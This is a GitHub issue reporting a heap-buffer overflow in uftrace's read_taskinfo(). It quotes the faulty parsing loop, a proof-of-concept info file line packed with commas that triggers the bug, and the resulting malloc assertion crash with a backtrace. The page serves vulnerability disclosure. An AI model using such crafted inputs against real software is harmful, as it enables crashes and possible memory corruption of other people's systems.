Skip to content

heap-buffer overflow in read_taskinfo() #938

New issue
New issue
Open
#1963
Open
heap-buffer overflow in read_taskinfo()#938
#1963
Labels
contributon2019good first issue
@gy741

Description

@gy741
gy741
opened on Oct 13, 2019

Hello,

I found heap-buffer overflow bug.

If there is a large amount of data(,) in the taskinfo:tids of the info file, it falls into an infinite
loop.

uftrace/cmds/info.c

Lines 560 to 569 in 2d6c907

while (*endp != '\n') {
int tid = strtol(tids_str, &endp, 10);
tids[nr_tid++] = tid;
if (*endp != ',' && *endp != '\n') {
free(tids);
goto out;
}
tids_str = endp + 1;

PoC:

cat uftrace.data/info

taskinfo:tids=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Crash info:

$ uftrace info
uftrace: malloc.c:2401: sysmalloc: Assertion `(old_top == initial_top (av) && old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)' fa

$bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1  0x00007f5b6b557801 in __GI_abort () at abort.c:79
#2  0x00007f5b6b5aaa91 in __malloc_assert (file=<optimized out>, function=<optimized out>, line=<optimized out>, assertion=<optimized out>) at malloc.c:298
#3  sysmalloc (nb=nb@entry=112, av=av@entry=0x7f5b6b902c40 <main_arena>) at malloc.c:2398
#4  0x00007f5b6b5abff0 in _int_malloc (av=av@entry=0x7f5b6b902c40 <main_arena>, bytes=bytes@entry=100) at malloc.c:4125
#5  0x00007f5b6b5ae0fc in __GI___libc_malloc (bytes=100) at malloc.c:3057
#6  0x00007f5b6b59f525 in _IO_vasprintf (result_ptr=0x7ffe0645e6d0, format=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", args=args@entry=0x7ffe0645e5c0)
    at vasprintf.c:47
#7  0x00007f5b6b57c154 in ___asprintf (string_ptr=string_ptr@entry=0x7ffe0645e6d0, format=format@entry=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n")
    at asprintf.c:35
#8  0x00007f5b6b5472f4 in __assert_fail_base (fmt=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x45b28a "nr_tid == info->nr_tid",
    file=file@entry=0x45af00 "/workspace/security/uftrace/cmds/info.c", line=line@entry=576, function=function@entry=0x45ba90 <__PRETTY_FUNCTION__.7725> "read_taskinfo")
    at assert.c:57
#9  0x00007f5b6b547412 in __GI___assert_fail (assertion=0x45b28a "nr_tid == info->nr_tid", file=0x45af00 "/workspace/security/uftrace/cmds/info.c", line=576,
    function=0x45ba90 <__PRETTY_FUNCTION__.7725> "read_taskinfo") at assert.c:101
#10 0x000000000040c3f6 in read_taskinfo (arg=0x7ffe0645e8b0) at /workspace/security/uftrace/cmds/info.c:576
#11 0x000000000040d6fd in read_uftrace_info (info_mask=15359, handle=0x7ffe064609f0) at /workspace/security/uftrace/cmds/info.c:950
#12 0x000000000042edfc in open_info_file (opts=0x7ffe06460c40, handle=0x7ffe064609f0) at /workspace/security/uftrace/utils/data-file.c:492
#13 0x000000000040e6e9 in command_info (argc=0, argv=0x7ffe06460ea8, opts=0x7ffe06460c40) at /workspace/security/uftrace/cmds/info.c:1212
#14 0x0000000000405ee6 in main (argc=0, argv=0x7ffe06460ea8) at /workspace/security/uftrace/uftrace.c:1171

Metadata

Metadata

Assignees

No one assigned

    Labels

    contributon2019good first issue

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions